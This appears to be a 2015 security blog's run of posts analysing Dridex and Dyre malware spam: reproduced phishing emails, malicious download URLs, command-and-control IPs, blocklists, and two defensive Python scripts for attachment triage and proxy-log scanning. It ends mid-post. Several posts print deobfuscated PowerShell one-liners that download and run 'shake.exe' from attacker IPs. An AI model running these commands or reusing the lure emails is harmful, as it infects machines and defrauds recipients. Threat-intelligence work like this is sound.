
Friday, 20 March 2015

Something evil on 85.143.216.102 and 94.242.205.101

I will confess that I don't have much information on what this apparent exploit kit is or how it works, but there seems to be something evil on 94.242.205.101 (root SA, Luxembourg) [VT report] being reached via 85.143.216.102 (AirISP, Russia) [VT report].

Whatever it is, it is using subdomains from hijacked GoDaddy accounts [1] [2] which is a clear sign of badness. The hijacked GoDaddy domains change very quickly, but these have all been used in the past day or so on both those IPs:

dchsleep.com
manymike.com
vladeasa.com
ezdockparts.com
suurtampere.com
visikreatif.com
josemiguelez.com
reformapenal.com
axwaydropzone.com
capitolskopje.com
theantennapub.com
faceofsustengo.com
niagarajournal.com
crystalbeachhill.com
ezdockadirondacks.com
ezdockfingerlakes.com
chambel.info
lidifaria.info
ewwebinars.co
cybercoaching.co
ewwebinars.com
eyouthcounseling.com
ecounselingnation.com
epastoralcounseling.com
extraordinaryfamilies.com
drtim.net
drclinton.net
ewomencast.net
ecounseling.net
drtimclinton.net
ecouplecounseling.net
biblicalcoachingtoday.net
drclinton.org

For practical purposes though I recommend you block traffic to the IPs rather than the domains.

Recommended blocklist:
85.143.216.102
94.242.205.101

UPDATE:
The following nearby IPs have also been distributing badness. I recommend you block these too:
85.143.216.103
94.242.205.98

Thursday, 19 March 2015

Malware spam: "Invoice ID:987654321 in attachment." from random senders

This spam has no body text and a randomly-generated sender name and invoice ID number. Sample subjects include:

Invoice ID:07dda8035 in attachment.
Invoice ID:09bf252 in attachment.
Invoice ID:108df399 in attachment.
Invoice ID:11847972 in attachment.
Invoice ID:156a35519 in attachment.
Invoice ID:16bb539 in attachment.
Invoice ID:16de0833 in attachment.
Invoice ID:17ff9887 in attachment.
Invoice ID:19b5b30 in attachment.

Sample senders:

Angelia Oliver
Annette Hunter
Austin Bennett
Belinda Cameron
Brittney Dixon
Buster Nolan
Candace Bowers
Christian Kemp
Clarissa Gentry
Cruz Mcintosh
Doug Haney
Dylan Poole
Erwin Hale
Gordon Downs
Hallie Neal
Oscar Bradshaw
Reyna Carver
Rosalie Acevedo
Sid Alston
Sophia Scott
Tanner Puckett
Tia Kline
Trudy Hensley
Valerie Delaney
Ivy Stokes
Jeanie Frye
Karin Frank
Kayla Travis
Mai Rowland
Marilyn Fleming
Minerva Glover

The Word document contains an embedded OLE object that leads to a malicious VBA macro. The payload is exactly the same as the one used in this attack.


Malware spam: "Aspiring Solicitors Debt Collection" has mystery XML attachment

This spam has a malicious attachment.

Date:    19 March 2015 at 12:52
Subject:    Aspiring Solicitors Debt Collection

Aspiring Solicitors

Ref : 195404544
Date : 02.10.2014
Dear Sir, Madam
Re: Our Client Bank of Scotland PLC
Account Number:77666612
Balance:       2,345.00
We are instructed by Bank of Scotland PLC in relation to the above matter.

You are required to pay the balance of GBP 2,345.00 in full within 7(seven) days from the date of this email to avoid Country Court proceedings being issued against you. Once proceedings have been issued, you will be liable for court fees and solicitors costs detailed below.

Court Fees  GBP 245.00

Solicitors Costs  GBP 750.00

Cheques or Postal Orders should be  made payable to Bank of Scotland PLC and sent to the address in attachment below quoting the above account number.
We are instructed by our Client that they can accept payment by either Debit or Credit Card.If you wish to make a payment in this wa, then please contact us with your Card details. We will then pass these details on to our Client in order that they may process your agreed payment. Kindly note that any payment made will be shown on your Bank and/or Credit Card Statement as being made to Bank of Scotland PLC
If you have any queries regarding this matter or have a genuine reason for non payment, you should contact us within 7 days from the date of this email to avoid legal proceedings being issued against you, by filling the contact us form in attachment below.

Yours faithfully,
Shawn Ballard
Aspiring Solicitors

Department CCD, Box 449
Upper Ground Floor
1-5 Queens Road Quadrant
Brighton
BN1 3XJ
United Kingdom

Attached is a file with a random numerical name (e.g. 802186031.doc) which is in fact a malicious XML file that appears to drop the Dridex banking trojan. Indications are that this can run even with macros disabled. Each attachment has a unique MD5.

Analysis is currently pending; this appears to use several new techniques to avoid detection. According to this Twitter conversation one version attempts to download a binary from 91.226.93.51/smoozy/shake.exe, although this is currently timing out for me. For security analysts, a sample of the XML file can be found here.

IMPORTANT: if you have opened this document in Word then there is a good chance that you are infected. I would recommend that you shut down any machine that has opened this. Anti-virus detections are currently very poor, but vendors may have signatures available soon; I would wait 24 hours before attempting to disinfect any infected machine. Dridex collects banking passwords, so it is important that infected machines are not used for financial transactions.

UPDATE:

This particular attack uses some novel features. Opening the Word document reveals what appears to be an embedded XLS file:

There's some interesting metadata.. created by "Dredex" of "Ph0enix Team", then modified by "ПРроываААА".


In the typical attack scenario, opening the embedded file will force the macro to run. In this case, I used LibreOffice on a Linux box which does not support VBA. This revealed the malicious code, which looks like this.

A bit of copy-and-pasting reveals nothing more sophisticated than some Base 64 encoded text that attempts to run one of the following commands:
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.199/smoozy/shake.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://91.226.93.51/smoozy/shake.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://91.227.18.76/smoozy/shake.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://176.31.28.244/smoozy/shake.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;
FYI, those IPs are allocated as follows:

193.26.217.199 (Servachok Ltd, Russia)
91.226.93.51 (Sobis OOO, Russia)
91.227.18.76 (Eximius LLC, Russia)
176.31.28.244 (OVH, France / Bitweb LLC, Russia)

"shake.exe" has a VirusTotal detection rate of 3/57. Between that VirusTotal report and this Malwr report we can see the malware attempting to connect to:

95.163.121.33 (Digital Networks aka DINETHOSTING, Russia)
87.236.215.105 (OneGbits, Lithuania)
31.160.233.212 (KPN Zakelijk Internet, Netherlands)

Further analysis is pending.

Recommended blocklist:
193.26.217.199
91.226.93.51
91.227.18.76
176.31.28.244
95.163.121.0/24
87.236.215.105
31.160.233.212





Malware spam: "sales@marflow.co.uk" / "Your Sales Order"

This spam run pretends to come from Marflow Engineering but it doesn't, instead it is a simple forgery. Marflow are not sending out this email, nor have their systems been compromised in any way.

From:    sales@marflow.co.uk
Date:    19 March 2015 at 09:13
Subject:    Your Sales Order

Your order acknowledgment is attached.

Please check carefully and advise us of any issues.

Best regards

Marflow

Attached is a file 611866.xls which appears to come in at least three different versions. But due to an error in the way the spam has been created, the attachment is actually corrupt and (depending on your version of Excel) attempting to open it gives this error:


The file you are trying to open, '611866.xls', is in a different format than specified by the file extension. Verify that the file is not corrupted and is from a trusted source before opening the file. Do you want to open the file now?
Clicking OK loads up what looks like gobbledegook.


If you see this, then you have had a lucky escape because the attachment is in the wrong format and is Base 64 encoded. If you manually run a Base 64 decoder against it then you end up with a malicious XLS file, in one of three different flavours with low detection rates [1] [2] [3] which in turn each contain a slightly different malicious macro [1] [2] [3] which then attempt to download from the following locations:

http://www.lenhausen.de/js/bin.exe
http://meostore.net/js/bin.exe
http://mvw1919.de/js/bin.exe

This is saved in the %TEMP% folder under the filenames pirit86.exe, tikapom64.exe and Trekaldo51.exe (although the binary is the same in each case). This malicious binary has a detection rate of just 2/57 and according to the Malwr report, it phones home to the following IPs:

37.139.47.81 (Pirix, Russia)
5.100.249.215 (OMC Computers & Communications, Israel)
195.162.107.7 (Gamma Telecom, UK)
131.111.37.221 (University of Cambridge, UK)
198.245.70.182 (Deniz Toprak, Turkey / B2 Net Solutions, US)
210.205.74.43 (DAEMINCUSTOM, Korea)
46.228.193.201 (Aqua Networks Ltd, Germany)

It also drops another version of the downloader, edg1.exe, which has a detection rate of 1/56, and a DLL which also has a detection rate of 1/57. The payload is the Dridex banking trojan.
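The two attachment shapes in this post and in the "Aspiring Solicitors" post above (a whole attachment that is nothing but Base64 text, and a Word 2003 XML document with an embedded OLE object) can both be triaged without Office. The script below is an added example and not code from the original post; it assumes the WordprocessingML convention of a w:binData element holding Base64 data, and that an oledata.mso part is an ActiveMime wrapper (magic "ActiveMime", short header, then a zlib stream, commonly at offset 0x32). The sample inputs are constructed in build_samples() and contain no real malware.

```python
import base64
import re
import zlib

# Container signatures for the file types that turn up in these spam runs.
MAGIC = [
    (b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1", "OLE2 compound file (legacy .doc/.xls)"),
    (b"PK\x03\x04", "ZIP container (OOXML .docx/.xlsx or plain .zip)"),
    (b"MZ", "Windows PE executable"),
    (b"MSCF", "Microsoft CAB archive"),
    (b"ActiveMime", "ActiveMime wrapper (compressed OLE inside Office XML)"),
]

def identify(data):
    """Name the container by its leading bytes; 'unknown' if nothing matches."""
    for sig, name in MAGIC:
        if data.startswith(sig):
            return name
    head = data.lstrip()[:64]
    if head.startswith(b"<?xml") or head.startswith(b"<w:wordDocument"):
        return "XML text (Word 2003 WordprocessingML or similar)"
    return "unknown"

_B64_TEXT = re.compile(rb"^[A-Za-z0-9+/=\r\n]+$")

def unwrap_base64(data):
    """Undo a whole-attachment Base64 wrapper (the corrupt 611866.xls case).
    Heuristic: the file consists of nothing but Base64 alphabet and line breaks."""
    if len(data) > 16 and _B64_TEXT.match(data):
        try:
            return base64.b64decode(b"".join(data.split()), validate=True)
        except ValueError:          # binascii.Error is a ValueError
            pass
    return data

def unwrap_activemime(blob):
    """oledata.mso parts start with 'ActiveMime', then a short header, then a
    zlib stream (commonly at offset 0x32). Rather than trust a fixed offset,
    try every plausible zlib header after the magic and keep the first that
    inflates to a recognisable container."""
    if not blob.startswith(b"ActiveMime"):
        return blob
    for i in range(len(b"ActiveMime"), len(blob) - 1):
        # zlib header check: CMF == 0x78 and (CMF<<8 | FLG) divisible by 31
        if blob[i] == 0x78 and ((blob[i] << 8) | blob[i + 1]) % 31 == 0:
            try:
                out = zlib.decompressobj().decompress(blob[i:])
            except zlib.error:
                continue
            if identify(out) != "unknown":
                return out
    return blob

# <w:binData w:name="oledata.mso">...base64...</w:binData>
_BINDATA = re.compile(rb'<w:binData\b[^>]*?w:name="([^"]*)"[^>]*>(.*?)</w:binData>', re.S)

def extract_bindata(xml_bytes):
    """Return every embedded binary part of a Word 2003 XML document."""
    parts = []
    for m in _BINDATA.finditer(xml_bytes):
        try:
            raw = base64.b64decode(b"".join(m.group(2).split()))
        except ValueError:
            continue
        payload = unwrap_activemime(raw)
        parts.append({
            "name": m.group(1).decode("utf-8", "replace"),
            "wrapper": identify(raw),          # what the part looks like as stored
            "payload_type": identify(payload), # what it is once unwrapped
            "payload": payload,
        })
    return parts

def triage(data):
    """Undo whole-file Base64, identify the container, and dig into XML parts."""
    data = unwrap_base64(data)
    kind = identify(data)
    parts = extract_bindata(data) if kind.startswith("XML") else []
    return {"type": kind, "parts": parts}

def build_samples():
    """Constructed inputs (no real malware): a fake 512-byte OLE2 sector wrapped
    the way Word 2003 XML embeds an object, and a Base64-wrapped copy that
    mimics the corrupted Marflow attachment."""
    fake_ole = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1" + b"\x00" * 504
    mso = b"ActiveMime" + b"\x00" * 40 + zlib.compress(fake_ole)   # stream at 0x32
    xml = (b'<?xml version="1.0"?>\n'
           b'<w:wordDocument xmlns:w="http://schemas.microsoft.com/office/word/2003/wordml">'
           b'<w:binData w:name="oledata.mso">' + base64.b64encode(mso) + b'</w:binData>'
           b'<w:body/></w:wordDocument>')
    base64_xls = base64.encodebytes(fake_ole)   # line-wrapped, as a MIME body is
    return xml, base64_xls

if __name__ == "__main__":
    for sample in build_samples():
        r = triage(sample)
        print(r["type"], [(p["name"], p["wrapper"], p["payload_type"]) for p in r["parts"]])
```

The payload bytes returned for each part are what you would hash and submit to VirusTotal; on the real documents the OLE2 payload is where the VBA project lives, so a tool such as olevba can be pointed at it directly.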

Recommended blocklist:
37.139.47.0/24
5.100.249.215
195.162.107.7
131.111.37.221
198.245.70.182
210.205.74.43
46.228.193.201


Wednesday, 18 March 2015

Malware spam: "JP Morgan Access [Carrie.Tolstedt@jpmorgan.com]" / "FW: Customer account docs"

This fake financial spam comes with a malicious attachment.


From:    JP Morgan Access [Carrie.Tolstedt@jpmorgan.com]
Date:    18 March 2015 at 17:49
Subject:    FW: Customer account docs


JP Morgan

We have received the following documents regarding your account, if you would like to confirm the changes please check / view the documents please click here.


Carrie Tolstedt
Carrie L. Tolstedt
Carrie.Tolstedt@chase.com
Senior Executive Vice President
Community Banking
J.P. Morgan Treasury and Securities Services

This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended recipient you are notified that disclosing, copying, distributing or taking any action in reliance on the contents of this information is strictly prohibited.


As it happens, Carrie L Tolstedt is a real executive... at Wells Fargo. The lady in the picture is another Wells Fargo employee entirely.

But anyway, this is a simple forgery containing a link to a file at Cubby which downloads as Documents_JP3922PV8.zip and contains a malicious file Documents_JP3922PV8.exe which has an icon to make it look like an Adobe Acrobat file.

The executable has a low VirusTotal detection rate of 3/57.  Various automated analysis tools [1] [2] [3] [4] show the malware downloading additional components from:

bej-it-solutions.com/pvt/ixusn.rtf
capslik.com/mandoc/ixusn.rtf


It then attempts to POST data to an IP at 109.230.131.95 (Vsevnet Ltd. Russia) which is a critical IP to block if you want to protect yourself against this type of Upatre / Dyre attack.

The Malwr report also shows that amongst other things it downloads an executable lwxzqrk36.exe which has a detection rate of just 2/57. That Malwr report also shows that it downloads and pops up a PDF about drone strikes.

Source: malwr.com
Presumably this PDF pops up to make the victim think that they have been duped into opening some politically-themed spam. Instead, they have actually installed the Dyre banking trojan.. in other words, the victim may well think that it is nothing serious when it really is.

The download locations for this Upatre/Dyre combination change all the time, but the IP address of 109.230.131.95  has been around for a little while. Also, it is a characteristic of this malware that it calls out to checkip.dyndns.org to determine the client IP address.. monitoring for traffic going to that location can be a useful indicator of infection.
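The blocklists on this page mix single IPs with CIDR ranges, and the checkip.dyndns.org call-out described above is a behavioural indicator rather than something to block. The script below is an added example (not from the original post) showing how both are applied to proxy logs: it parses Squid-style access.log lines, matches the destination against the blocklist entries taken from this page, flags the external-IP lookup, and reports clients that show both signals. The log lines and the documentation-range peer addresses in them are constructed for the example.

```python
import ipaddress
from urllib.parse import urlsplit

# Indicators lifted from this page's blocklists: single IPs and CIDR ranges mixed.
BLOCKLIST = [
    "109.230.131.95",     # Upatre/Dyre POST target from this post
    "95.163.121.0/24",    # Digital Networks / DINETHOSTING range (Dridex C2)
    "92.63.88.0/24",
    "85.143.166.0/24",
    "193.26.217.199",
    "176.31.28.244",
]
# Hostnames that are not malicious in themselves but that this malware contacts.
INDICATOR_HOSTS = {"checkip.dyndns.org"}

def compile_blocklist(entries):
    """Parse 'a.b.c.d' and 'a.b.c.0/24' strings into network objects."""
    return [ipaddress.ip_network(e.strip(), strict=False) for e in entries]

def ip_is_blocked(ip, nets):
    """True if `ip` (a string) falls inside any blocklisted network."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:          # hostnames and junk are simply not IPs
        return False
    return any(addr in n for n in nets)

def scan_log(lines, nets, hosts):
    """Scan Squid-style access.log lines and return (client, kind, detail) hits.
    Fields: time elapsed client action/code size method url ident hier/peer type."""
    hits = []
    for line in lines:
        f = line.split()
        if len(f) < 9:
            continue
        client, url = f[2], f[6]
        peer = f[8].split("/", 1)[-1]          # the IP the proxy actually connected to
        host = (urlsplit(url).hostname or "").lower()
        if host in hosts:
            hits.append((client, "indicator-host", host))
        elif ip_is_blocked(host, nets):
            hits.append((client, "blocked-ip", host))
        elif ip_is_blocked(peer, nets):        # hostname that resolved into a bad range
            hits.append((client, "blocked-ip", peer))
    return hits

def suspect_clients(hits):
    """Group hits per client; a client showing both kinds is the strongest signal."""
    out = {}
    for client, kind, _ in hits:
        out.setdefault(client, set()).add(kind)
    return out

# Constructed sample log (documentation-range addresses stand in for resolved hosts).
SAMPLE_LOG = """\
1426700101.233    210 10.1.2.15 TCP_MISS/200 512 GET http://checkip.dyndns.org/ - DIRECT/203.0.113.10 text/html
1426700102.871    180 10.1.2.15 TCP_MISS/200 64 POST http://109.230.131.95/ - DIRECT/109.230.131.95 text/plain
1426700103.005     90 10.1.2.40 TCP_MISS/200 4096 GET http://95.163.121.186/api/gbb1.exe - DIRECT/95.163.121.186 application/octet-stream
1426700104.410     30 10.1.2.77 TCP_MISS/200 2048 GET http://www.example.com/ - DIRECT/198.51.100.7 text/html
"""

if __name__ == "__main__":
    nets = compile_blocklist(BLOCKLIST)
    found = scan_log(SAMPLE_LOG.splitlines(), nets, INDICATOR_HOSTS)
    for client, kinds in suspect_clients(found).items():
        print(client, sorted(kinds))
```

Checking the peer address as well as the URL host matters here: the download locations change all the time and are often hostnames, but they keep resolving into the same few ranges, which is why the /24 entries pay off.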



Malware spam: "Your online Gateway.gov.uk Submission"

This spam leads to a malicious ZIP file hosted either on Dropbox or Cubby.

From:    Gateway.gov.uk
Date:    18 March 2015 at 13:19
Subject:    Your online Gateway.gov.uk Submission

Electronic Submission Gateway

Thank you for your submission for the Government Gateway.
The Government Gateway is the UK's centralized registration service for e-Government services.

To view/download your form to the Government Gateway please visit http://www.gateway.gov.uk/file/s/gdvzk7toum8ghnc/SecureDocument.zip?dl=1

This is an automatically generated email. Please do not reply as the email address is not
monitored for received mail.

gov.uk - the best place to find government services and information - Opens in new window

The best place to find government services and information

The link leads to an archive file Avis_De_Paiement.zip which in turn contains a malicious binary Avis_De_Paiement.scr which has a VirusTotal detection rate of 16/57. ThreatExpert and Comodo CAMAS report that it downloads components from the following locations:

canabrake.com.mx/css/doc11.rtf
straphael.org.uk/youth2000_files/doc11.rtf


My sources indicate that this most likely phones home to 109.230.131.95 (Vsevnet Ltd. Russia) which is a known bad IP that I recommend blocking. The payload appears to be the Upatre downloader leading to the Dyre banking trojan.

Malware spam: "December unpaid invoice notification"

This spam comes with no body text, but does come with a malicious attachment.

From:    Korey Mack
Date:    18 March 2015 at 11:04
Subject:    December unpaid invoice notification

So far I have only seen a single sample with an attached file called 11IDJ325.doc which is undetected by AV vendors. Inside is a malicious macro [pastebin] with an encrypted section that executes this:
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://176.31.28.244/smoozy/shake.exe','%TEMP%\huiUGI8t8dsF.cab'); expand %TEMP%\huiUGI8t8dsF.cab %TEMP%\huiUGI8t8dsF.exe; start %TEMP%\huiUGI8t8dsF.exe;
Although the EXE file from 176.31.28.244 (OVH, France / Bitweb LLC, Russia) is downloaded as a CAB file and then EXPANDed to an EXE, there is in fact no file transformation happening at all (which is odd). This executable has a detection rate of 2/57.

This Malwr report shows it downloading a DLL with an MD5 of a40e588e614e6a4c9253d261275288bf [VT 4/57] which is the same payload as found in this earlier spam run, along with another executable with an MD5 of 409397f092d3407f95be42903172cf06 which is not in the VirusTotal database. The report also shows the malware phoning home to the following IPs:

31.25.77.154 (Call U Communications, Palestine)
95.163.121.33 (Digital Networks CJSC aka DINETHOSTING, Russia)
188.165.5.194 (OVH, Ireland)
188.165.26.237 (OVH, Latvia)
115.241.60.56 (Reliance Communication, India)
46.19.143.151 (Private Layer INC, Switzerland)

Recommended blocklist:
31.25.77.154
95.163.121.0/24
188.165.5.194
188.165.26.237
115.241.60.56
46.19.143.151
176.31.28.244



Malware spam: "Confirmation of Booking" / "NWN Media Ltd" / "Della Richardson"

This spam is not from NWN Media Ltd but is instead a simple forgery sent out to random email addresses with a malicious attachment. NWN Media are not responsible for this spam, nor have their systems been compromised.

From:    della.richards2124@nwn.co.uk [della.richards@nwn.co.uk]
Date:    18 March 2015 at 08:34
Subject:    Confirmation of Booking

This booking confirmation forms a binding contract between yourselves and NWN Media Ltd.
If you do not agree with any of the details above then please contact the named sales representative on the above number immediately.


Yours sincerely,

Della
NWN Media Ltd

Attached is a file NWN Confirmation Letter.doc which I have so far seen in two different versions, both with low detection rates [1] [2] which contain slightly different malicious macros [1] [2] which then go and download a malicious binary from one of the following locations:

http://pmmarkt.de/js/bin.exe
http://deosiibude.de/deosiibude.de/js/bin.exe

These are saved as %TEMP%\zakilom86.exe and %TEMP%\Pikadlo64.exe respectively. The binaries are actually identical and have a VirusTotal detection rate of 5/57. According to the Malwr report this binary attempts to communicate with the following IPs:

31.41.45.211 (Relink Ltd, Russia)
109.234.159.250 (Selectel Ltd, Russia)
37.59.50.19 (OVH, France)
62.76.179.44 (Clodo-Cloud / IT House, Russia)
95.163.121.200 (Digital Networks CJSC aka DINETHOSTING, Russia)

It then drops what appears to be another version of itself called edg1.exe onto the target system [VT 2/55] along with a malicious Dridex DLL [VT 3/55]

Recommended blocklist:
31.41.45.211
109.234.159.250
37.59.50.19
62.76.179.44
95.163.121.0/24



Saturday, 14 March 2015

Quttera fails and spews false positives everywhere

By chance, I found out that my blog had been blacklisted by Quttera. No big deal, because it happens from time to time due to the nature of the content on the site. But I discovered that it isn't just my blog: Quttera also blocks industry-leading sites such as Cisco, VMware, Sophos, MITRE, AVG and PhishTank.

For example, at the time of writing the following domains are all blacklisted by Quttera (clicking the link shows the current blacklisting status):

www.cisco.com
www.vmware.com
cve.mitre.org
www.auscert.org.au
www.phishtank.com
www.buzzfeed.com
www.reddit.com
dl.dropbox.com
www.avg.com
www.malekal.com
nakedsecurity.sophos.com
blog.dynamoo.com
malware-traffic-analysis.net
blog.malwaremustdie.org

Cisco's blacklisting entry looks like this:

Now, you can ask Quttera to unblacklist your site for free by raising a ticket but the most prominent link leads to a paid service for £60/year. Hmmm.

I don't think that I will rush to subscribe to that. Obviously, something is seriously wrong with the algorithm in use; some of these sites should obviously be whitelisted. Quttera also doesn't understand the difference between a malicious domain or IP being mentioned on a site and such a domain being linked to from, or injected into, that site.

I guess there are many, many more domains that are in a similar situation. Perhaps you might want to check your own web properties and share your findings in the comments?

Friday, 13 March 2015

Malware spam: "Invoice (13\03\2015) for payment to COMPANY NAME"

There is a series of malware spams in progress in the following format:

Invoice (13\03\2015) for payment to JUPITER PRIMADONA GROWTH TRUST
Invoice (13\03\2015) for payment to CARD FACTORY PLC
Invoice (13\03\2015) for payment to CELTIC
Invoice (13\03\2015) for payment to MIRADA PLC

Note the use of the backslash in the date. There is an attachment in the format 1234XYZ.doc which I have seen three different variants of (although one of those was zero length), one of which was used in this spam run yesterday and one new one with zero detections which contains this malicious macro, which downloads another component from:

http://95.163.121.186/api/gbb1.exe

This is saved as %TEMP%\GHjkdfg.exe - incidentally, this server is wide open and is full of data and binaries relating to the Dridex campaign. Unsurprisingly, it is hosted on a Digital Networks CJSC aka DINETHOSTING IP address. This binary has a detection rate of 3/53 and the Malwr report shows it phoning home to 95.163.121.33 which is also in the same network neighbourhood.

The binary also drops a malicious Dridex DLL with a detection rate of 5/56. This is the same DLL as used in this spam run earlier today.

Recommended blocklist:
95.163.121.0/24

Malware spam: "pentafoods.com" / "Invoice: 2262004"

This fake Penta Foods spam run is another variant of this and it comes with a malicious attachment. Penta Foods are not sending this email, instead it is a simple forgery.

From:    cc18923@pentafoods.com
Date:    13 March 2015 at 07:50
Subject:    Invoice: 2262004

Please find attached invoice :  2262004
  Any queries please contact us.

--
Automated mail message produced by DbMail.
Registered to Penta Foods, License MBA2009357.

Attached is a Word document R-1179776.doc which actually comes in two versions, both with zero detection rates, containing one of two malicious macros [1] [2] which then download a component from the following locations:

http://accalamh.aspone.cz/js/bin.exe
http://awbrs.com.au/js/bin.exe

This is saved as %TEMP%\fJChjfgD675eDTU.exe and has a VirusTotal detection rate of 5/57. Automated analysis tools [1] [2] show a phone-home attempt to:

62.76.179.44 (Clodo-Cloud / IT House, Russia)

My sources also indicate that it phones home to:

212.69.172.187 (Webagentur, Austria)
78.129.153.12 (iomart / RapidSwitch, UK)

According to this Malwr report it also drops a DLL with a detection rate of just 2/57 which is probably Dridex.

Recommended blocklist:
62.76.179.44
212.69.172.187
78.129.153.12


Thursday, 12 March 2015

Malware spam: "Invoice [1234XYZ] for payment to COMPANY NAME"

These rather terse emails appear to refer to various companies, and all come with a malicious attachment:

From:    Erasmo Small
Date:    12 March 2015 at 09:40
Subject:    Invoice [3479XZM] for payment to INCOME & GROWTH VCT PLC(THE)

From:    Eli Ramirez
Date:    12 March 2015 at 08:37
Subject:    Invoice [4053FJK] for payment to RANDGOLD RESOURCES

From:    Richard Baxter
Date:    12 March 2015 at 08:37
Subject:    Invoice [3020JQM] for payment to TARSUS GROUP PLC

From:    Megan Dennis
Date:    12 March 2015 at 09:36
Subject:    Invoice [4706CEZ] for payment to SHANKS GROUP

The attachment is a Word document with a name that matches the reference in the subject. So far, I have seen two different versions of this with low detection rates [1] [2] which contain these malicious macros [1] [2] [pastebin] which contain some quite entertaining obfuscation, but when deobfuscated try to download an additional component from the following locations:

https://92.63.88.102/api/gb1.exe
https://85.143.166.124/api/gb1.exe

Note the use of HTTPS. Those two IP addresses belong to:

92.63.88.102 (MWTV, Latvia)
85.143.166.124 (Pirix, Russia)


Both are well-known hosts for this sort of rubbish. According to the Malwr report this attempts to phone home to:

95.163.121.33 (Digital Networks CJSC aka DINETHOSTING, Russia)

Digital Networks is also a sea of crap. It also drops a Dridex DLL with a detection rate of 9/57.

Recommended blocklist:
95.163.121.0/24
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
85.143.166.0/24


Wednesday, 11 March 2015

Malware spam: "Voicemail Message (07813297716) From:07813297716"

When was the last time someone sent you a voice mail message by email? Never? No surprise, then, that this spam email message has a malicious attachment.

From:     Voicemail admin@victimdomain
Date:     11/03/2015 11:48
Subject:     Voicemail Message (07813297716) From:07813297716

IP Office Voicemail redirected message

Attachment: MSG00311.WAV.ZIP

The attachment is a ZIP file containing a malicious EXE file called MSG00311.WAV.exe which has a VirusTotal detection rate of 5/57. According to the Malwr report, it pulls down another executable and some config files from:

http://wqg64j0ei.homepage.t-online.de/data/log.exe
http://cosmeticvet.su/conlib.php

This behaviour is very much like a Dridex downloader, a campaign that has mostly been using malicious macros rather than EXE-in-ZIP attacks.

The executable it drops has a detection rate of 2/54 and these Malwr reports [1] [2] show a further component download from:

http://muscleshop15.ru/js/jre.exe
http://test1.thienduongweb.com/js/jre.exe


This component has a detection rate of 5/57. According to the Malwr report for that we see (among other things) that it drops a DLL with a detection rate of 4/57 which is the same Dridex binary we've been seeing all day.

Piecing together the IP addresses found in those reports combined with some information from one of my intelligence feeds, we can see that the following IPs are involved in this activity:

31.41.45.211 (Relink Ltd, Russia)
62.213.67.115 (Caravan Telecom, Russia)
80.150.6.138 (Deutsche Telekom, Germany)
42.117.1.88 (FPT Telecom Company, Vietnam)
188.225.77.242 (TimeWeb Co. Ltd., Russia)
212.224.113.144 (First Colo GmbH, Germany)
37.59.50.19 (OVH, France)
62.76.179.44 (Clodo-Cloud, Russia)
95.163.121.200 (Digital Networks CJSC aka DINETHOSTING, Russia)
185.25.150.33 (NetDC.pl, Poland)
104.232.32.119 (Net3, US)
188.120.243.159 (TheFirst.RU, Russia)

Recommended blocklist:
31.41.45.211
62.213.67.115
80.150.6.138
42.117.1.88
188.225.77.242
212.224.113.144
37.59.50.19
62.76.179.44
95.163.121.0/24
185.25.150.33
104.232.32.119
188.120.243.159




Malware spam: Message from "RNP0026735991E2" / "inv.09.03"

This pair of spam emails are closely related and have a malicious attachment:

From:    admin.scanner@victimdomain
Date:    11 March 2015 at 08:49
Subject:    Message from "RNP0026735991E2"

This E-mail was sent from "RNP0026735991E2" (MP C305).

Scan Date: 11.03.2015 08:57:25 (+0100)
Queries to: admin.scanner@victimdomain

Attachment: 201503071457.xls
----------

From:    Jora Service [jora.service@yahoo.com]
Date:    11 March 2015 at 09:27
Subject:    inv.09.03

Attachment: INV 86-09.03.2015.xls

Neither XLS attachment is currently detected by AV vendors [1] [2] and they contain two related but slightly different macros [1] [2] which download a component from the following locations:

http://koschudu.homepage.t-online.de/js/bin.exe
http://03404eb.netsolhost.com/js/bin.exe

The file is then saved as %TEMP%\fJChjfgD675eDTU.exe  which has a VirusTotal detection rate of 3/57. According to this Malwr report, it attempts to connect to the following IPs:

188.225.77.216 (TimeWeb Co. Ltd, Russia)
42.117.1.88 (FPT Telecom Company, Vietnam)
31.41.45.211 (Relink Ltd, Russia)
87.236.215.103 (OneGbits, Lithuania)
104.232.32.119 (Net3, US)
188.120.243.159 (TheFirst.RU, Russia)

It also drops a couple more malicious binaries with the following MD5s:

8d3a1903358c5f3700ffde113b93dea6 [VT 2/56]
53ba28120a193e53fa09b057cc1cbfa2 [VT 4/57]

Recommended blocklist:
188.225.77.216
42.117.1.88
31.41.45.211
87.236.215.103
104.232.32.119
188.120.243.159

Malware spam: BACS "Remittance Advice" / HMRC "Your Tax rebate"

These two malware spam runs are aimed at UK victims, pretending to be either a tax rebate or a BACS payment.

From:    Long Fletcher
Date:    11 March 2015 at 09:44
Subject:    Remittance Advice

Good Morning,

Please find attached the BACS Remittance Advice for payment made by RENEW HLDGS.

Please note this may show on your account as a payment reference of FPALSDB.

Kind Regards
Long Fletcher
Finance Coordinator


Attachment: LSDB.xls

----------

From:    Vaughn Baker
